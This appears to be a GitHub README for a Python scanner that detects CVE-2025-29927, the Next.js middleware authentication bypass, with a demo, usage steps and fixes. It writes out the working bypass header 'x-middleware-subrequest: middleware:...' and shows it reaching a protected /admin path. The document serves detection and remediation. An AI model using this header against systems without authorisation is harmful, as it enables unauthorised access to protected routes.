Python-based smart scanner for CVE-2025-29927, the Next.js middleware authentication bypass vulnerability. Detects meta refresh, keyword-based redirects, and more.
# CVE-2025-29927 - Next.js Middleware Bypass Detector
This Python-based smart scanner helps detect the **CVE-2025-29927** vulnerability in Next.js applications, a critical middleware bypass that allows attackers to skip authentication using a crafted HTTP header.
> The tool identifies not only HTTP redirects but also client-side redirection mechanisms such as `<meta http-equiv="refresh">`, keyword-based login redirects, and silent auth bypasses.
---
## Features
- Interactive input (target URL and path)
- Smart detection of:
  - `x-middleware-subrequest` bypass headers
  - `<meta refresh>` based redirects
  - HTML content with keywords like `login`, `sign in`, `authentication`
- Color-coded CLI output:
  - Green for 2xx responses
  - Yellow for 3xx
  - Red for 4xx/5xx
- Early exit if bypass is successful
- Easy to extend and customize
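
The redirect heuristics in the list above decide whether a response means "sent back to login" or "protected content served". The sketch below is an added example, not the repository's `CVE-2025-29927.py`: it uses the standard-library `html.parser` instead of BeautifulSoup, and `PageScan`, `classify_response` and the sample responses are assumed names and constructed data. Keyword matching is a heuristic, so a protected page that itself contains one of the keywords is reported as `login-page`.

```python
from html.parser import HTMLParser

LOGIN_KEYWORDS = ("login", "sign in", "authentication")  # from the feature list

class PageScan(HTMLParser):
    """Collect meta-refresh targets and visible text from an HTML body."""
    def __init__(self):
        super().__init__()
        self.refresh_targets, self.text, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        attr = {k: (v or "") for k, v in attrs}
        if tag in ("script", "style"):
            self._skip += 1  # ignore keywords inside code and CSS
        elif tag == "meta" and attr.get("http-equiv", "").lower() == "refresh":
            # content looks like "0; url=/login"; a bare delay is only a reload
            target = attr.get("content", "").partition(";")[2].strip()
            if target:
                self.refresh_targets.append(target)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data.lower())

def classify_response(status, headers, body):
    """Return 'http-redirect', 'meta-refresh', 'login-page' or 'content-served'."""
    if 300 <= status < 400 and any(k.lower() == "location" for k in headers):
        return "http-redirect"
    scan = PageScan()
    scan.feed(body)
    scan.close()  # flush any text still buffered by the parser
    if scan.refresh_targets:
        return "meta-refresh"
    if any(word in " ".join(scan.text) for word in LOGIN_KEYWORDS):
        return "login-page"
    return "content-served"

# Constructed sample responses: (status, headers, body)
SAMPLES = [
    (302, {"Location": "/login"}, ""),
    (200, {}, '<meta http-equiv="refresh" content="0; url=/login">'),
    (200, {}, "<h1>Sign in</h1><form></form>"),
    (200, {}, "<h1>Admin dashboard</h1>"),
]
if __name__ == "__main__":
    print([classify_response(*s) for s in SAMPLES])
```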
---
## Demo
```
$ python3 CVE-2025-29927.py
Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
Enter the protected path (e.g. /dashboard): /admin
Testing with header: middleware:middleware:middleware:middleware:middleware
↳ HTTP Status: 200
↳ Redirect detected: No
VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```
---
## How to Use
### 1. Clone the repository:
```bash
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
```
### 2. Install dependencies:
```bash
pip install -r requirements.txt
```
### 3. Run the script:
```bash
python3 CVE-2025-29927.py
```
---
## Project Structure
```
.
├── CVE-2025-29927.py   # Main interactive scanner
├── requirements.txt    # Python dependencies
└── README.md           # This file
```
---
## requirements.txt
```txt
requests
beautifulsoup4
colorama
```
---
## How to Fix
If your app is affected, do the following:
1. **Update Next.js** to `v15.2.3` or later (or `14.2.25+` / `13.5.7+`)
2. **Harden middleware routing** and avoid relying solely on middleware for authentication.
3. **Strip x-middleware-subrequest header** at the edge (e.g. Nginx):
```nginx
proxy_set_header x-middleware-subrequest "";
```
---
## About the Vulnerability
CVE-2025-29927 allows attackers to bypass Next.js middleware checks by manipulating the `x-middleware-subrequest` header with crafted values such as:
```
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```
In vulnerable versions, this disables middleware execution completely, allowing direct access to protected routes like `/dashboard`, `/admin`, etc.
---
## Contact
Maintained by: [@mrzblackhat](https://t.me/mrzblackhat)
Feel free to contact me on Telegram for suggestions, improvements, or contributions.
---
## Tags
`next.js` `CVE-2025-29927` `bugbounty` `middleware bypass` `authentication` `web security` `python security scanner` `ethical hacking`
---
## License
This tool is provided for **educational and research purposes only**. Use responsibly.